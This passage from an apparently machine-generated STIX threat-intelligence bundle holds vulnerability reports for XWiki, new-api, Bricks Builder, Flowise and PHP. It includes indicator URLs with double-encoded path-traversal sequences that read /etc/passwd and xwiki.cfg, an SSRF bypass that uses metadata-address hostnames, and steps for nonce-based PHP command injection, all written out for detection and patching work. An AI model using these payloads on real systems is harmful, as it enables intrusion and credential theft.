      "labels": [
        "rce",
        "web-vulnerability",
        "php",
        "egroupware",
        "linux"
      ],
      "object_refs": [
        "indicator--e94ea01c-8ef0-52d2-bcc9-658258472495",
        "indicator--63018d57-4ade-5db7-8a81-e29b214ef2e9",
        "indicator--86a01eff-a10c-51ff-bb6a-b21dd0fbeca3",
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-8737-2x9g-xjj7"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--cb22627b-9061-545c-ab1e-9968b2a8a943",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: http://[host]/xwiki/bin/skin/..%252f/..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd",
      "pattern": "[url:value = 'http://[host]/xwiki/bin/skin/..%252f/..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd']",
      "pattern_type": "stix",
      "valid_from": "2026-07-07T13:15:17Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--934d2790-a172-591a-8c84-ecb3dbcaeb48",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--faa6ed95-fb00-588a-8cb5-2c5038d3e171",
      "target_ref": "indicator--cb22627b-9061-545c-ab1e-9968b2a8a943"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--e950c87d-e8a7-5808-977f-8cc4a0649c1b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: http://[host]/xwiki/bin/skin/..%252f/..%252fWEB-INF/xwiki.cfg",
      "pattern": "[url:value = 'http://[host]/xwiki/bin/skin/..%252f/..%252fWEB-INF/xwiki.cfg']",
      "pattern_type": "stix",
      "valid_from": "2026-07-07T13:15:17Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--54f25fcc-b936-522e-9a50-32da3c93d085",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--faa6ed95-fb00-588a-8cb5-2c5038d3e171",
      "target_ref": "indicator--e950c87d-e8a7-5808-977f-8cc4a0649c1b"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ad0ea272-b4d8-5583-aa38-a3f03049df3f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--faa6ed95-fb00-588a-8cb5-2c5038d3e171",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--dba05e09-3e54-51b6-af3e-58644b62ad7d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "File and Directory Discovery",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1083",
          "url": "https://attack.mitre.org/techniques/T1083"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3b4865f8-5196-57b8-90ba-0e568a5d389a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--faa6ed95-fb00-588a-8cb5-2c5038d3e171",
      "target_ref": "attack-pattern--dba05e09-3e54-51b6-af3e-58644b62ad7d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Unsecured Credentials",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1552",
          "url": "https://attack.mitre.org/techniques/T1552"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d5df7563-87ce-54b2-a546-f18e2abec5f6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--faa6ed95-fb00-588a-8cb5-2c5038d3e171",
      "target_ref": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--faa6ed95-fb00-588a-8cb5-2c5038d3e171",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "XWiki Platform Old Core Path Traversal via /skin/ Endpoint (CVE-2026-34151)",
      "description": "## Overview\n\nCVE-2026-34151 identifies a critical path traversal vulnerability affecting XWiki Platform Old Core versions prior to 17.10.5 and between 18.0.0-rc-1 and 18.2.0, specifically when deployed on Jetty 12+ application servers. This flaw allows unauthenticated attackers to construct specially crafted URLs that, when processed by the vulnerable XWiki instance, can bypass directory restrictions. This enables access to any file on the underlying operating system that the Jetty process has permissions to read, including sensitive system files like `/etc/passwd` or application-specific configuration files such as `xwiki.cfg` and Hibernate settings. The vulnerability poses a significant information disclosure risk, as it could expose critical system and application data, potentially leading to further reconnaissance, credential harvesting, or escalation of privileges by a threat actor.\n\n## Attack Chain\n\n1.  **Initial Access:** An unauthenticated attacker sends an HTTP GET request to the vulnerable XWiki application's `/xwiki/bin/skin/` endpoint.\n2.  **Payload Crafting:** The attacker embeds double URL-encoded path traversal sequences (`..%252f`) within the URL path following the `/skin/` action.\n3.  **Targeting Sensitive Files:** The crafted URL aims to traverse directories to reach sensitive files, such as `http://[host]/xwiki/bin/skin/..%252f/..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd` for system files or `http://[host]/xwiki/bin/skin/..%252f/..%252fWEB-INF/xwiki.cfg` for application configuration files.\n4.  **Application Processing:** The XWiki application, running on Jetty 12+, processes the request to the `/skin/` endpoint.\n5.  **Path Traversal Execution:** Due to the vulnerability, Jetty 12+ misinterprets the encoded path traversal sequences, allowing the application to access resources outside its intended web application directory.\n6.  **File Retrieval:** The web server retrieves the content of the targeted file (e.g., `/etc/passwd`, `xwiki.cfg`) from the file system.\n7.  **Data Disclosure:** The server responds to the attacker with the contents of the sensitive file, revealing potentially critical system or application information.\n8.  **Impact:** This leads to information disclosure, which can be used for reconnaissance, identifying user accounts, understanding application architecture, or finding credentials for subsequent attacks.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-34151 can lead to severe information disclosure. Attackers can access any file on the server that the Jetty instance has read permissions for, including operating system files like `/etc/passwd`, revealing local user accounts and system configuration. More critically, it allows access to sensitive XWiki and Hibernate configuration files (e.g., `xwiki.cfg`), which often contain database connection strings, API keys, and other proprietary application settings. This information can be leveraged for further attacks, such as database compromise, privilege escalation, or lateral movement within the network. There are no reported victim counts, but any organization running affected XWiki versions on Jetty 12+ is at risk across all sectors.\n\n## Recommendation\n\n*   **Patch CVE-2026-34151:** Immediately upgrade XWiki Platform Old Core to version 17.10.5 or 18.2.0 or later to remediate CVE-2026-34151.\n*   **Deploy Detection Rule:** Deploy the provided Sigma rule \"Detects CVE-2026-34151 Exploitation — XWiki Path Traversal\" to your SIEM solution to identify attempts to exploit this vulnerability.\n*   **Monitor Webserver Logs:** Configure web server logging for HTTP requests to capture full URIs and query strings, specifically for unusual access patterns to the `/xwiki/bin/skin/` endpoint containing `..%252f` or similar encoded path traversal sequences.\n*   **Implement Workarounds (if patching is not immediate):** As a temporary measure, consider migrating XWiki to an application server other than Jetty 12+, such as Tomcat or an older version of Jetty (\u003c 12), as these are not impacted by this specific vulnerability.\n",
      "published": "2026-07-07T13:15:17Z",
      "labels": [
        "path-traversal",
        "web-vulnerability",
        "xwiki",
        "jetty",
        "cve",
        "information-disclosure",
        "platform:network"
      ],
      "object_refs": [
        "indicator--cb22627b-9061-545c-ab1e-9968b2a8a943",
        "indicator--e950c87d-e8a7-5808-977f-8cc4a0649c1b",
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--dba05e09-3e54-51b6-af3e-58644b62ad7d",
        "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-qj4x-9g63-25g6"
        },
        {
          "source_name": "reference",
          "url": "https://jira.xwiki.org/browse/XWIKI-24075"
        },
        {
          "source_name": "reference",
          "url": "https://jira.xwiki.org/browse/XCOMMONS-3594"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b0d3eab2-3d2a-5653-b8bc-f8a0e7d7fea8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--f7b9eab1-09d1-5453-8bc0-57c4f250a5d3",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--26ef37e6-18b0-51e5-b888-57037be44a7c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Active Scanning",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1595",
          "url": "https://attack.mitre.org/techniques/T1595"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--26326207-0997-5536-a5d7-240d504e9edc",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--f7b9eab1-09d1-5453-8bc0-57c4f250a5d3",
      "target_ref": "attack-pattern--26ef37e6-18b0-51e5-b888-57037be44a7c"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--f7b9eab1-09d1-5453-8bc0-57c4f250a5d3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "New API: SSRF Protection Bypass via Unresolved Hostname in Notification URLs",
      "description": "## Overview\n\nA significant vulnerability, CVE-2026-33655, has been identified in the QuantumNous `new-api` application, impacting all versions prior to `v0.12.0-alpha.1`. This Server-Side Request Forgery (SSRF) protection bypass allows authenticated users to interact with internal HTTP services that would otherwise be inaccessible. The flaw stems from a default configuration where `ApplyIPFilterForDomain` is disabled, meaning the application fails to resolve hostnames in notification URLs (Webhook, Bark, Gotify) to their IP addresses before applying IP filtering rules. This oversight permits an attacker to specify a hostname that resolves to an internal or metadata IP address, causing the vulnerable server to initiate outbound connections to these sensitive internal targets. This capability can be leveraged for internal network reconnaissance and information disclosure, posing a substantial risk to affected deployments.\n\n## Attack Chain\n\n1.  **Initial Access (Authenticated User)**: An attacker gains or compromises a legitimate user account within the vulnerable `new-api` application, as this vulnerability requires authenticated access to configure notification URLs.\n2.  **Identify Internal Targets**: The attacker identifies potential internal HTTP services or cloud metadata endpoints accessible from the `new-api` deployment network through reconnaissance or prior knowledge.\n3.  **Configure Notification URL**: The authenticated attacker accesses the application's notification settings (e.g., Webhook, Bark, or Gotify) where custom URLs can be specified.\n4.  **SSRF Payload Insertion**: The attacker crafts a notification URL containing an unresolved hostname (e.g., `localhost`, `169.254.169.254.nip.io` or a custom hostname resolving to an internal IP) that points to the identified internal target.\n5.  **Server Initiates Request**: Upon a triggering event, the `new-api` application attempts to resolve the provided hostname and initiate an outbound connection for the notification.\n6.  **IP Filtering Bypass**: Due to the default `ApplyIPFilterForDomain: false` setting in affected versions, the application does not resolve the hostname to its IP address and compare it against the configured internal/metadata IP blocklist before making the connection.\n7.  **Internal Network Interaction**: The `new-api` server proceeds to make a direct network request to the internal IP address or metadata endpoint disguised by the attacker's crafted hostname.\n8.  **Information Disclosure**: The attacker observes the application's behavior (e.g., timing, error messages, or direct responses) to discover internal network topology, sensitive data, or credentials, potentially leading to further exploitation and unauthorized access.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-33655 allows a regular authenticated user to bypass existing SSRF protections and compel the `new-api` server to initiate connections to internal HTTP services or cloud metadata APIs. Depending on the target environment, this can lead to significant information disclosure. Attackers can leverage timing analysis, error messages, or direct responses to map internal networks, enumerate services, or exfiltrate sensitive data such as API keys, cloud credentials, or private configuration details. While the advisory does not specify observed victim counts or sectors, any organization using affected `new-api` versions in an environment with accessible internal HTTP services is at risk of unauthorized data exposure and potential lateral movement.\n\n## Recommendation\n\n*   Immediately upgrade to `new-api` version `v0.12.0-alpha.1` or later to address CVE-2026-33655.\n*   If immediate upgrade is not possible, explicitly enable `ApplyIPFilterForDomain: true` in your `new-api` configuration to enforce hostname resolution and IP filtering.\n*   Implement an allowlist for domains that can be used in notification URLs, restricting connectivity to only known, legitimate external services.\n*   Disable user-configurable notification URLs within the `new-api` where practical, limiting the attack surface for this and similar vulnerabilities.\n*   Enforce robust outbound network filtering at the host or network layer, blocking connections from the `new-api` server to internal IP ranges (e.g., 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16, 169.254.169.254/32) and other unauthorized destinations.\n",
      "published": "2026-07-07T13:16:31Z",
      "labels": [
        "ssrf",
        "api",
        "vulnerability",
        "bypass",
        "web-application"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--26ef37e6-18b0-51e5-b888-57037be44a7c"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-6qcr-qxgr-m7fv"
        },
        {
          "source_name": "reference",
          "url": "CVE-2026-33655"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f00ed5a4-a3bc-5e67-854a-0a1014744cf0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--63077a91-37d0-5e16-a8b9-f6a6fcabbc02",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3d399d56-6d04-5fc4-8d51-f18ca8497f5a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--63077a91-37d0-5e16-a8b9-f6a6fcabbc02",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--63077a91-37d0-5e16-a8b9-f6a6fcabbc02",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "WordPress Bricks Builder Theme - Unauthenticated RCE (CVE-2024-25600)",
      "description": "## Overview\n\nA critical unauthenticated Remote Code Execution (RCE) vulnerability, tracked as CVE-2024-25600, has been disclosed and publicly exploited in the WordPress Bricks Builder Theme versions up to and including 1.9.6. Attackers can leverage the `render_element` endpoint, which is part of the theme's AJAX functionality, to execute arbitrary operating system commands on the compromised WordPress server. This exploitation begins with an initial request to retrieve a valid nonce from the page source, which is then used in a subsequent crafted POST request to the vulnerable endpoint. The availability of a working public exploit, identified as EDB-52619 on Exploit-DB, significantly elevates the risk, making unpatched WordPress installations using Bricks Builder Theme prime targets for immediate compromise by a broad range of malicious actors.\n\n## Attack Chain\n\n1.  **Initial Access**: An unauthenticated attacker targets a public-facing WordPress instance running the vulnerable Bricks Builder Theme (version \u003c= 1.9.6).\n2.  **Information Gathering**: The attacker sends a GET request to the target WordPress site to retrieve the HTML source code of any page.\n3.  **Defense Evasion (Nonce Extraction)**: The attacker parses the HTML response to locate a `\u003cscript\u003e` tag with the ID `bricks-scripts-js-extra` and extracts the `nonce` value from its content using a regular expression.\n4.  **Execution - PHP Code Injection**: The attacker crafts a malicious JSON payload containing the extracted `nonce` and PHP code designed to execute arbitrary OS commands using PHP's backtick operator (e.g., `` `command` ``).\n5.  **Exploitation Request**: A POST request is sent to either `/wp-json/bricks/v1/render_element` or `/?rest_route=/bricks/v1/render_element` with the crafted JSON payload, triggering the RCE.\n6.  **Command and Control**: Upon successful exploitation, the attacker achieves remote code execution and can establish an interactive shell or execute further commands to maintain persistence, exfiltrate data, or deploy additional malware.\n\n## Impact\n\nSuccessful exploitation of CVE-2024-25600 results in unauthenticated remote code execution on the underlying server hosting the WordPress installation. This grants attackers full control over the compromised web server, allowing them to steal sensitive data, deface the website, inject malware, pivot to other systems within the network, or establish persistent backdoors. Given the widespread use of WordPress and its themes, the potential number of vulnerable instances is high, making this a critical threat to organizations relying on Bricks Builder Theme.\n\n## Recommendation\n\n*   Immediately update the WordPress Bricks Builder Theme to a patched version (1.9.7 or newer) to remediate CVE-2024-25600.\n*   Deploy the `Detect CVE-2024-25600 Exploitation - Bricks Builder RCE` Sigma rule to your SIEM and tune for your environment to identify exploitation attempts.\n*   Monitor `webserver` logs for suspicious POST requests containing PHP code injection patterns to the `/wp-json/bricks/v1/render_element` or `/?rest_route=/bricks/v1/render_element` endpoints.\n",
      "published": "2026-07-07T13:26:28Z",
      "labels": [
        "wordpress",
        "rce",
        "webapps",
        "exploit-db",
        "cve"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.exploit-db.com/exploits/52619"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3c7cb8c4-86b3-589e-831e-90f5906c402c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dbf08f69-2458-55e4-b74d-de62921bcf02",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3f09112d-7ad0-53c9-869c-6232589b2a33",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dbf08f69-2458-55e4-b74d-de62921bcf02",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--dbf08f69-2458-55e4-b74d-de62921bcf02",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Flowise 3.1.3 Arbitrary Code Execution Exploit Published",
      "description": "## Overview\n\nA critical arbitrary code execution (ACE) vulnerability has been publicly disclosed and an exploit published on Exploit-DB (EDB-52623) targeting Flowise version 3.1.3 and earlier. Flowise is an open-source low-code platform for building custom LLM (Large Language Model) orchestration flows. The availability of a working exploit means that unpatched Flowise instances exposed to the internet are at severe risk of compromise, allowing unauthorized attackers to execute arbitrary commands on the underlying server. This significantly elevates the threat level for organizations utilizing Flowise, as successful exploitation can lead to full system control, data exfiltration, and further network lateral movement, making immediate patching imperative for all affected systems.\n\n## Attack Chain\n\n1.  **Initial Access**: Attacker identifies an internet-exposed instance of Flowise version 3.1.3 or earlier using reconnaissance techniques like Shodan or similar scanning tools.\n2.  **Exploitation**: The attacker crafts and sends a malicious request exploiting the arbitrary code execution vulnerability (EDB-52623) within the Flowise web application.\n3.  **Command Execution**: The vulnerable Flowise application processes the attacker's request, which includes embedded commands or code, resulting in their execution on the underlying server with the privileges of the web server process.\n4.  **Shell Access**: The attacker gains initial shell access or command execution capability on the compromised server, often by leveraging commonly available system utilities or reverse shell techniques.\n5.  **Establish Persistence**: The attacker may then establish persistence mechanisms, such as creating new user accounts, modifying system services, deploying web shells, or scheduling tasks to maintain access.\n6.  **Lateral Movement and Data Exfiltration**: With persistent access, the attacker proceeds with internal network reconnaissance, lateral movement to other systems, and exfiltration of sensitive data from the compromised environment.\n7.  **Impact Fulfillment**: The ultimate objective is typically data theft, deployment of ransomware, or using the compromised server as a pivot point for further attacks against the organization or its partners.\n\n## Impact\n\nThe impact of this arbitrary code execution vulnerability is severe, potentially leading to full system compromise of the server hosting Flowise. Successful exploitation can grant attackers complete control over the affected system, enabling them to steal sensitive data, deploy malware (e.g., ransomware, cryptominers), pivot to other systems within the network, or disrupt business operations. Organizations across all sectors using Flowise 3.1.3 or earlier, particularly those exposing instances to the public internet, are at risk. Data breaches, operational downtime, and reputational damage are direct consequences of unpatched systems.\n\n## Recommendation\n\n*   Immediately patch all Flowise instances to a version higher than 3.1.3 to remediate the arbitrary code execution vulnerability (EDB-52623).\n*   Monitor webserver logs for suspicious requests targeting Flowise endpoints, specifically looking for anomalous parameters or command injection attempts related to the arbitrary code execution vulnerability.\n*   Implement robust network segmentation for Flowise deployments, isolating them from critical internal systems and sensitive data stores.\n",
      "published": "2026-07-07T13:50:47Z",
      "labels": [
        "webapps",
        "arbitrary-code-execution",
        "exploit-db",
        "flowise"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.exploit-db.com/exploits/52623"
        }
      ],
      "confidence": 95
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--b4328ecf-c9dc-5936-9154-fb157cb4ecbd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Multiple Vulnerabilities in PHP (CVE-2026-12184, CVE-2026-14355)",
      "description": "## Overview\n\nCERT-FR has issued an advisory (CERTFR-2026-AVI-0843) concerning multiple vulnerabilities impacting several versions of PHP, a widely used server-side scripting language. These vulnerabilities, identified as CVE-2026-12184 and CVE-2026-14355, affect PHP versions 8.2.x prior to 8.2.32, 8.3.x prior to 8.3.32, 8.4.x prior to 8.4.23, and 8.5.x prior to 8.5.8. The official PHP security bulletins for these fixes were released on July 2, 2026. While the specific nature and potential impact of these issues are not detailed by the publisher, the presence of multiple unpatched vulnerabilities in a core web technology poses a significant risk. Attackers could potentially leverage these flaws to compromise web servers, leading to data breaches, denial of service, or remote code execution, making timely patching crucial for defenders.\n\n## Impact\n\nThe CERT-FR advisory indicates that these multiple vulnerabilities allow an attacker to cause \"unspecified security issues.\" While exact details are not provided, flaws in PHP can frequently lead to severe consequences for affected systems. Potential impacts include remote code execution (RCE) on the server, information disclosure, privilege escalation, or denial of service conditions. Web applications and backend services running vulnerable PHP versions are at risk of compromise, which could result in unauthorized access to sensitive data, defacement of websites, or disruption of critical business operations. No specific victim count or targeted sectors were provided in the advisory, but the widespread use of PHP implies broad potential exposure.\n\n## Recommendation\n\n*   Prioritize patching all affected PHP installations immediately to versions 8.2.32, 8.3.32, 8.4.23, or 8.5.8 as per the PHP security bulletins referenced.\n*   Review web server logs for unusual activity following patch deployment, specifically looking for HTTP requests that might indicate exploitation attempts related to CVE-2026-12184 and CVE-2026-14355, although specific patterns are not available.\n*   Consult the official PHP changelogs (e.g., https://www.php.net/ChangeLog-8.php#8.2.32) for detailed information regarding the fixes and any potential configuration changes.\n",
      "published": "2026-07-07T13:55:23Z",
      "labels": [
        "vulnerability",
        "php",
        "web-application",
        "server-side"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.cert.ssi.gouv.fr/avis/CERTFR-2026-AVI-0843/"
        },
        {
          "source_name": "reference",
          "url": "https://www.php.net/ChangeLog-8.php#8.2.32"
        },
        {
          "source_name": "reference",
          "url": "https://www.php.net/ChangeLog-8.php#8.3.32"
        },
        {
          "source_name": "reference",
          "url": "https://www.php.net/ChangeLog-8.php#8.4.23"
        },
        {
          "source_name": "reference",
          "url": "https://www.php.net/ChangeLog-8.php#8.5.8"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-12184"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-14355"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8ae44356-500a-52a9-bbd8-a63fb781e34c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--689a0228-3e60-5990-8cdd-bf21836b2037",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "T1059",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ab055da3-c1f4-5f9e-b399-f8461c3dc8b7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--689a0228-3e60-5990-8cdd-bf21836b2037",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exfiltration Over C2 Channel",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1041",
          "url": "https://attack.mitre.org/techniques/T1041"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a561ade7-4cd6-588c-a0d9-b0acd6660cf9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--689a0228-3e60-5990-8cdd-bf21836b2037",
      "target_ref": "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--689a0228-3e60-5990-8cdd-bf21836b2037",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Multiple Vulnerabilities in SPIP CMS Lead to Data Confidentiality Loss",
